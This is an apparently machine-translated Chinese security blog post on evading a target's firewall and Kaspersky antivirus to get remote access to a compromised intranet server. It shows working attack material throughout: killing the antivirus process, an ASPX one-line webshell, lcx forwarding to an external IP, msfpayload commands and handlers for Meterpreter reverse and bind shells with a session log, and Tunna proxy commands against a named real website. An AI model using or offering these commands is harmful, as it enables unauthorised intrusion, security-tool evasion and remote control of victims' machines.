当前位置:网站首页>A summary of the posture of bouncing and forwarding around the firewall
A summary of the posture of bouncing and forwarding around the firewall
2022-06-24 07:29:00 【Xiaoxiang Xin'an】
Statement : Most of the official account is from the author's daily notes. , A few articles are also reproduced by authorship of the original author and other official account. , unaccredited , It is strictly prohibited to reprint , If you want to reprint , Contact and talk . Do not use the related technology in the article to engage in illegal testing , Any adverse consequences arising from this are not related to the author and the official account. . |
|---|
0x01 Preface
Date/time:2014 year , Recently, I got some pain from setting up an intranet server , There is Kaspersky Anti-Virus 8.0. In the normal environment, the intranet is used directly Lcx Forward the specified port to , But how to bypass the firewall ? Here I wrote this record article according to the practice test process .
Bypass Kaba to get the session :
kavfswp.exe It is Kaspersky's anti-virus work process , Used to intercept malicious programs , Such as the common right raising EXP、MSF Load, etc , However, it is found in the test that this process can be ended ( With self start ), It will automatically run the process a few seconds after the end of the process , But there will be a few seconds between them , Use the interval time to quickly MSF Just upload the load and run it .
notes : It was found that there were several times when they did not run for a long time kavfswp.exe, The test was a little painful , I will not worry about this problem any more .
taskkill /f /im kavfswp.exe
In the actual test process, we have put Kaspersky After the anti-virus protection is turned off, it still cannot be forwarded normally , So I guess the system firewall may be turned on or there may be some other hardware firewall , The following tools and methods were tested in this bypass case .
0x02 Lcx
The regular Intranet environment can be used directly Lcx.exe Forward the specified port , Then connect locally 1234 Port can . But here we can see what we are listening to 51 The connection status of the port is SYN_SENT, The probability is that it is blocked by the firewall inbound and outbound rules .
C:\Recovery\lcx.exe -listen 51 1234 C:\Recovery\lcx.exe -slave 113.xxx.xx.5 51 127.0.0.1 3389 [option:] -listen Connection port <ConnectPort> Sending port <TransmitPort> -tran Connection port <ConnectPort> Sending host <TransmitHost> Sending port <TransmitPort> -slave Connecting hosts <ConnectHost> Connection port <ConnectPort> Sending host <TransmitHost> Sending port <TransmitPort>
Basic friend @KoMas Tips : Use Lcx The listening port can be changed to 80 You can bypass firewall restrictions , During the test, you should pay attention to check the local 80 Whether the port is occupied , If it is occupied, an error will be returned , Missing picture .(Success !)
0x03 Aspx Client
Aspx Client In a word, code :
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>C:\Recovery\lcx.exe -listen 52 1234 [+] Listening port 52 ...... [+] Listen OK! [+] Listening port 1234 ...... [+] Listen OK! [+] Waiting for Client on port:52 ......
0x04 Metasploit
(1) Reverse_tcp
Use Metasploit Generate attack payloads and listen , Then the attack payload port.exe File by Webshell Upload to the target disk and execute , You can see that one is blocked by the firewall , As shown in the figure below .
[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=113.***.**.250 LPORT=12345 X > /media/hake/port.exe msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.10 msf exploit(handler) > set LPORT 12345 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.10:12345 [*] Starting the payload handler...
stay 《Metasploit bind_tcp Actual combat application 》 The precautions mentioned in the article : If reverse_tcp Try to change the port after the reverse connection is blocked 80、443、8080, These ports are rarely blocked , After the actual test, it is found that the listening port only needs to be changed to 80 You can bypass firewall restrictions to get Meterpreter conversation .(Success !)
(2) Bind_tcp
Use bind_tcp Used for forward connection test 9999 Listening port , After running the attack payload, the target host is opened 9999 port , But not with our attack aircraft IP establish TCP Connect .
[email protected]:~# msfpayload windows/meterpreter/bind_tcp LPORT=9999 X > /media/hake/port.exe msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(handler) > set RHOST 80.**.**.21 msf exploit(handler) > set LPORT 9999 msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler...
(3) Reverse_http
Metasploit_Reverse_http The idea comes from 90sec A Daniel and DM_ An article from “metasploit Notes on Intranet penetration ”, But in the actual test, it is found that , Using other ports will be blocked by the firewall , As shown in the figure below .
[email protected]:~# msfpayload windows/meterpreter/reverse_http LHOST=113.***.**.236 LPORT=4444 R | msfencode -t aspx -o /media/hake/port.aspx msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http msf exploit(handler) > set LHOST 192.168.1.9 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit [*] Started HTTP reverse handler on http://0.0.0.0:4444/ [*] Starting the payload handler...
Basic friend @darkz3r Tips , He usually uses 443 Port as listening port , With the attitude of trying, I didn't expect to really succeed , According to him, heikuo is often used in foreign countries 443 Port to listen .
(4) Reverse_https
We tested it earlier Reverse_tcp Listening port 1234 and reverse_http Listening port 4444 Are blocked by the firewall , But testing reverse_https Listening port 4444 It was found that the firewall restriction was successfully bypassed to obtain Meterpreter conversation , Missing picture .
[email protected]:~# msfpayload windows/meterpreter/reverse_https LHOST=113.***.**.106 LPORT=4444 X > /media/hake/test.exe msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https PAYLOAD => windows/meterpreter/reverse_https msf exploit(handler) > set LHOST 192.168.1.9 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit [*] Started HTTPS reverse handler on https://0.0.0.0:4444/ [*] Starting the payload handler... [*] 113.***.**.106:2069 Request received for /5xWX... [*] 113.***.**.106:2069 Staging connection for target /5xWX received... [*] Patched user-agent at offset 663656... [*] Patched transport at offset 663320... [*] Patched URL at offset 663384... [*] Patched Expiration Timeout at offset 664256... [*] Patched Communication Timeout at offset 664260... [*] Meterpreter session 3 opened (192.168.1.5:4444 -> 80.**.**.21:2069) at 2014-08-05 23:49:20 +0800
0x05 reDuh_Gui
reDuh_Gui The tool support scripts are :ASPX/PHP/JSP, In the process of penetration testing, it also depends on which scripts the target host supports , The target host I tested here supports ASPX/PHP Script , take ASPX The script does a demo test , As shown in the figure below .
0x06 Http_Tunna
We often use reDuh、Tunna and reGeorg And so on are positive agents , Upload the proxy script to the server , The local program connects to the script on the server , Script as agent forwarding port and traffic , It is also called port multiplexing ,HTTP Tunnel .
although Http_Tunna and reDuh_Gui It works the same way , but Http_Tunna than reDuh_Gui Fast , And more stable . Support scripts include :ASPX/PHP/JSP, You can also directly Metasploit Use... Under the frame , But first you have to tunna_exploit.rb Copy the document to MSF Module directory , Missing picture .
[email protected]:~# ruby proxy.rb -u http://www.canton*********dolonne.fr/u_fichier/conn.aspx -l 1234 -r 3389 -v msf > use exploit/windows/misc/tunna_exploit msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(tunna_exploit) > set RHOST 113.***.**.236 msf exploit(tunna_exploit) > set TARGETURI http://www.canton*********dolonne.fr/u_fichier/conn.aspx msf exploit(tunna_exploit) > set VERBOSE true msf exploit(tunna_exploit) > exploit -j
notes : It was found in the test that reDuh_Gui succeed , and Http_Tunna But failed , Maybe I have a problem with my posture , It could be Http_Tunna ASPX Script problems ,@ Chen Xiaobing Shifu also mentioned in his article that I saw JSP and PHP Successful port forwarding , Therefore, it is necessary to conduct more tests in actual combat , The author will no longer study the reasons for its failure in detail .
0x07 Bypass Firewall
Ⅰ. Use the reverse connection test 80/443 Wait for the listening port to see if it can bypass the firewall restrictions .(Success !)
1. Lcx、2. Aspx Client、3.1 Reverse_tcp、3.3 Reverse_http、3.3 Reverse_https
Ⅱ. Use the forward connection test Bind_tcp Attack payload to see if it can bypass firewall restrictions .(Failure!)
3.2 Bind_tcp
Ⅲ. Use HTTP Tunnel test reDuh_Gui,Tunna_0.1 And other tools to see if they can bypass firewall restrictions .(Success !)
4. reDuh_Gui、5. Http_Tunna、reGeorg、neo_reGeorg
边栏推荐
- RDD基础知识点
- 电脑如何打开软键盘,教大家Win10如何打开软键盘的方法
- bjdctf_ 2020_ babystack
- [learn FPGA programming from scratch -42]: Vision - technological evolution of chip design in the "post Moorish era" - 1 - current situation
- [security] how to [host security - hybrid cloud version] support secure access to non Tencent virtual machines
- Spark stage and shuffle for daily data processing
- Accessing user interface settings using systemparametersinfo
- Smart space 𞓜 visualization of operation of digital twin cargo spacecraft
- Ultra wideband pulse positioning scheme, UWB precise positioning technology, wireless indoor positioning application
- [GUET-CTF2019]zips
猜你喜欢
Huawei Cloud Database Advanced Learning
jarvisoj_ level2
Win11怎么设置让CPU性能全开?Win11CPU怎么设置高性能模式?
20个不容错过的ES6技巧
如何删除/选择电脑上的输入法
Accessing user interface settings using systemparametersinfo
![buuctf misc [UTCTF2020]docx](/img/e4/e160f704d6aa754e85056840e14bd2.png)
buuctf misc [UTCTF2020]docx
6000多万铲屎官,捧得出一个国产主粮的春天吗?
![[MRCTF2020]千层套路](/img/8e/d7b6e7025b87ea0f43a6123760a113.png)
[MRCTF2020]千层套路
Big factories are not the only way to measure ability. The three years' experience of Shangcai's graduation
随机推荐
Research on redis High Availability Mechanism
【图像融合】基于方向离散余弦变换和主成分分析的图像融合附matlab代码
Muxvlan principle, Huawei MUX VLAN experimental configuration
两个链表的第一个公共节点_链表中环的入口(剑指offer)
How to select a third-party software testing company? 2022 ranking of domestic software testing institutions
【WordPress建站】5. 设置代码高亮
get_started_3dsctf_2016
Mysql---三张表(student,课程,分数) 查询课程为数学的学生姓名,编号,成绩
[cnpm] tutorial
蓝牙耳机怎么连接电脑使用,win10电脑如何连接蓝牙耳机
What is the mentality of spot gold worth learning from
A penetration test of c/s Architecture - Request encryption, decryption and test
bjdctf_2020_babystack
【图像融合】基于像素显着性结合小波变换实现多焦点和多光谱图像融合附matlab代码
[从零开始学习FPGA编程-41]:视野篇 - 摩尔时代与摩尔定律以及后摩尔时代的到来
Spark stage and shuffle for daily data processing
20个不容错过的ES6技巧
MaxCompute远程连接,上传、下载数据文件操作
软件性能测试分析与调优实践之路-JMeter对RPC服务的性能压测分析与调优-手稿节选
Precipitation of architecture design methodology